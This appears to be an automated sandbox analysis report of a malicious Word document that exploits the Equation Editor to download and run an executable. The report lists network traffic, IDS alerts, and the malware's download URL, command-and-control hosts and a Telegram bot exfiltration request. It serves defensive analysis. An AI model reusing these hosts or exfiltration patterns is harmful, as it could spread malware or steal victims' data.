                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49161

                  Networking

                  Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49161
                  Source: unknown DNS query: name: api.telegram.org
                  Source: Yara match File source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.26.2; Date: Wed, 30 Oct 2024 07:19:41 GMT; Content-Type: application/x-msdos-program; Content-Length: 787968; Connection: keep-alive; Last-Modified: Tue, 29 Oct 2024 06:19:00 GMT; ETag: "c0600-625978f9ea95d"; Accept-Ranges: bytes
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/qHbynE8Vgwabsy3.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9386F2-5C34-4EE8-9432-0E98A6485B50}.tmpJump to behavior
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:20:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.403039735.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403118978.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exe
                  Source: EQNEDT32.EXE, 00000002.00000003.403039735.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403118978.0000000000610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeC:
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeN
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/qHbynE8Vgwabsy3.exettC:
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000269D000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: cdlpohayugo39567.exe, 00000007.00000002.912204117.0000000005A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.912204117.0000000005A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407830206.00000000025BB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
